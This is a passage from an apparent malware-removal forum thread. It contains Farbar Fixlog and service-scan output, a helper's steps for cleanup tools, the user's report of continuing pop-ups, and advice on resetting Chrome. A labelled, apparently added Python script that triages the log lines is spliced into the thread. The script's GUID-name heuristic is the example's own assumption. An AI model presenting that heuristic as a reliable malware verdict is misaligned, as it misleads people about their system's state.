"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6C59EFE-9151-4D35-BEA9-93E8415BF71B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6C59EFE-9151-4D35-BEA9-93E8415BF71B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
C:\BlackChipPoker => ":Win32App_1" ADS removed successfully.
C:\Program Files\Bonjour => ":Win32App_1" ADS removed successfully.
C:\Program Files\CCleaner => ":Win32App_1" ADS removed successfully.
C:\Program Files\Dolby Digital Plus => ":Win32App_1" ADS removed successfully.
C:\Program Files\FileZilla FTP Client => ":Win32App_1" ADS removed successfully.
C:\Program Files\Intel => ":Win32App_1" ADS removed successfully.
C:\Program Files\iTunes => ":Win32App_1" ADS removed successfully.
C:\Program Files\Microsoft Office 15 => ":Win32App_1" ADS removed successfully.
C:\Program Files\Microsoft Silverlight => ":Win32App_1" ADS removed successfully.
C:\Program Files\WinRAR => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Apple Software Update => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\BlueStacks => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Bonjour => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\DVD Shrink => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\LastPass => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Magical Jelly Bean => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Microsoft Silverlight => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\mIRC => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Mozilla Firefox => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\MSXML 4.0 => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\QuickTime Alternative => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\TeamViewer => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\VPN Unlimited => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\VUDUToGo => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\XnConvert => ":Win32App_1" ADS removed successfully.
C:\WINDOWS\SysWOW64 => ":Win32App_1" ADS removed successfully.
C:\ProgramData\BlueStacks => ":Win32App_1" ADS removed successfully.
C:\ProgramData\Intel(R) Update Manager => ":Win32App_1" ADS removed successfully.
C:\ProgramData\regid.1991-06.com.microsoft => ":Win32App_1" ADS removed successfully.

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2017-03-03 22:20:37)

C:\ProgramData\DP45977C.lfl => Is moved successfully

==== End of Fixlog 22:20:39 ====
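
Added example (not part of the thread and not FRST's own code): a short Python triage of the Fixlog result lines and fixlist `Task:` lines shown above. It reports which targets did not end in a successful action and which scheduled tasks still pointed at a file. The status categories, `REVIEW_DIRS` and the GUID-name heuristic are assumptions of this example.

```python
import re

# Lines copied from the Fixlog results posted in this thread (a subset).
FIXLOG_SAMPLE = r'''
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
ibtsiva => Unable to stop service.
ibtsiva => service removed successfully
C:\Users\007\AppData\Local\PUTTY.RND => moved successfully
Could not move "C:\ProgramData\DP45977C.lfl" => Scheduled to move on reboot.
C:\WINDOWS\System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => moved successfully
"C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe" => File/Folder not found.
C:\BlackChipPoker => ":Win32App_1" ADS removed successfully.
C:\ProgramData\DP45977C.lfl => Is moved successfully
'''

# Lines copied from the "fixlist content" part of the same log (a subset).
FIXLIST_SAMPLE = r'''
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {8794EAED-EC72-4A28-B331-B9F73019EBBE} - System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe <==== ATTENTION
'''

# '<target> => <outcome>', with optional quotes and the 'Could not move' prefix.
RESULT_RE = re.compile(
    r'^(?:Could not move )?"?(?P<target>.+?)"? => (?P<outcome>.+)$', re.M)
# 'Task: {id} - <name> -> <target>' or '... => <target>', optional ATTENTION marker.
TASK_RE = re.compile(
    r'^Task: \{(?P<id>[0-9A-Fa-f-]{36})\} - (?P<name>.+?) [-=]> '
    r'(?P<target>.+?)(?: <=+ ATTENTION)?$', re.M)
GUID_RE = re.compile(r'[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}')
# Locations this example treats as worth a second look for a task binary (assumption).
REVIEW_DIRS = ('\\programdata\\', '\\appdata\\', '\\temp\\')


def status_of(outcome):
    """Map the free-text outcome to a coarse status (categories are this example's)."""
    text = outcome.lower()
    if 'successfully' in text:
        return 'ok'
    if 'scheduled to move on reboot' in text:
        return 'deferred'
    if 'not found' in text:
        return 'missing'
    return 'failed'


def parse_fixlog(text):
    """Return [(target, status), ...] in log order; a target may appear twice."""
    return [(m['target'], status_of(m['outcome'])) for m in RESULT_RE.finditer(text)]


def unresolved(results):
    """Targets whose last recorded status is not 'ok'.

    A later line supersedes an earlier one, e.g. a file scheduled for a
    reboot-time move that is then reported as moved.
    """
    last = {}
    for target, status in results:
        last[target.lower()] = (target, status)
    return [(t, s) for t, s in last.values() if s != 'ok']


def classify_tasks(fixlist_text):
    """Split Task lines into orphans ('No File') and tasks that pointed at a file.

    A live task goes to 'review' when its target sits in REVIEW_DIRS and the
    task or file name is GUID-like (heuristic of this example, not an FRST verdict).
    """
    report = {'orphan': [], 'live': [], 'review': []}
    for m in TASK_RE.finditer(fixlist_text):
        name, target = m['name'], m['target']
        if target == 'No File':
            report['orphan'].append(name)
            continue
        report['live'].append(name)
        in_review_dir = any(d in target.lower() for d in REVIEW_DIRS)
        if in_review_dir and GUID_RE.search(name + target):
            report['review'].append((name, target))
    return report


if __name__ == '__main__':
    for target, status in unresolved(parse_fixlog(FIXLOG_SAMPLE)):
        print(f'{status:8} {target}')
    report = classify_tasks(FIXLIST_SAMPLE)
    print(len(report['orphan']), 'orphaned tasks;', len(report['review']), 'to review')
```

On these lines the `ibtsiva` service and `DP45977C.lfl` both end as `ok` because a later line supersedes the earlier failure, so the only target left is the executable the GUID-named task pointed to, which the log reports as "File/Folder not found".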
 
Last scans...

Download Security Check from here or here and save it to your Desktop.
  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE to access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive the UNSUPPORTED OPERATING SYSTEM! ABORTED! message, restart the computer and Security Check should run.


Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
  • Internet Services
  • Windows Firewall
  • System Restore
  • Security Center
  • Windows Update
  • Windows Defender
  • Other Services

Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run from.
Please copy and paste the log to your reply.


Download Temp File Cleaner (TFC)
Alternate download: http://www.itxassociates.com/OT-Tools/TFC.exe
  • Double click on TFC.exe to run the program.
  • Click on Start button to begin cleaning process.
  • TFC will close all running programs, and it may ask you to restart computer.


Download Sophos Free Virus Removal Tool and save it to your desktop.
  • Double click the icon and select Run
  • Click Next
  • Select I accept the terms in this license agreement, then click Next twice
  • Click Install
  • Click Finish to launch the program
  • Once the virus database has been updated click Start Scanning
  • If any threats are found click Details, then View log file... (bottom left hand corner)
  • Copy and paste the results in your reply
  • Close the Notepad document, close the Threat Details screen, then click Start cleanup
  • Click Exit to close the program
 
Currently running Sophos.

Security Check Log
Results of screen317's Security Check version 1.014 --- 12/23/15
x64 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Defender
[size=1]WMI entry may not exist for antivirus; attempting automatic update.[/size]
`````````Anti-malware/Other Utilities Check:`````````
Java 8 Update 101
Java SE Development Kit 8 Update 101
Java version 32-bit out of Date!
Adobe Flash Player 24.0.0.221
Mozilla Firefox (50.1.0)
Google Chrome (56.0.2924.87)
Google Chrome (SetupMetrics...)
````````Process Check: objlist.exe by Laurent````````
Windows Defender MSMpEng.exe
Malwarebytes Anti-Malware mbamservice.exe
Malwarebytes Anti-Malware mbamtray.exe
Windows Defender MSASCuiL.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: %
````````````````````End of Log``````````````````````

-----------------------------------------------------------------------------------------
FSS Log

Farbar Service Scanner Version: 27-01-2016
Ran by 007 (administrator) on 03-03-2017 at 22:31:25
Running from "C:\Users\007\Downloads"
Microsoft Windows 10 Home (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Policy:
========================


Security Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============

Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
------------------------------------------------------------------------------------------

TFC

2766mb cleaned

------------------------------------------------------
 
I wanted to let you know that the pop-ups have not stopped. They are just as bad. I think Malwarebytes had them at bay... I kept noticing pop-ups of sites being blocked from Malwarebytes. I tried stopping the application to see what would happen. That was a mistake. I turned it back on. I am having trouble accessing this thread to even post this message. I ended up typing it into Notepad and pasting it in. Let me know your suggestion. I can do a reformat if need be, but I don't know how to get the product key for my version of Office and Windows. I tried Magical Jelly Bean and it only gave me the Windows product, NOT Office. Any suggestions? Or if you have any more tricks, let me know. I'm afraid if I try to back everything up I'm going to back up the virus and I'm going to be in trouble all over again.
 
If only Chrome is affected I posted before what to do...

Reset Chrome...
Click on "Customize and control Google Chrome":

Click "Settings" then "Show advanced settings" at the bottom of the screen.
Click "Reset browser settings" button.
Restart Chrome.

If the above didn't help....

Reinstall Chrome...
If you want to save your bookmarks...
How to Backup Bookmarks in Google Chrome
If you want to save your passwords as well see here: http://www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/
  • Close all Chrome windows and tabs.
  • Go to the Start menu > Control Panel. (Windows 8 users: Learn how to access the Control Panel)
  • Click Programs and Features.
  • Double-click Google Chrome.
  • Click Uninstall from the confirmation dialog. Delete your user profile information, like your browser preferences, bookmarks, and history, by selecting the "Also delete your browsing data" checkbox.
Install a fresh copy.
 
Alright, give me a few days to see what happens. I'll leave notifications from Malwarebytes on so I know if there is anything that is getting blocked. I'll report back accordingly.
 
I suggest you don't wait.
Waiting and using a compromised browser may bring more bad stuff to your computer.
...and we'll have to start all over.
 
I should have been more explicit. I will follow the instructions you provided and see what happens. I've already reset the browser settings.
 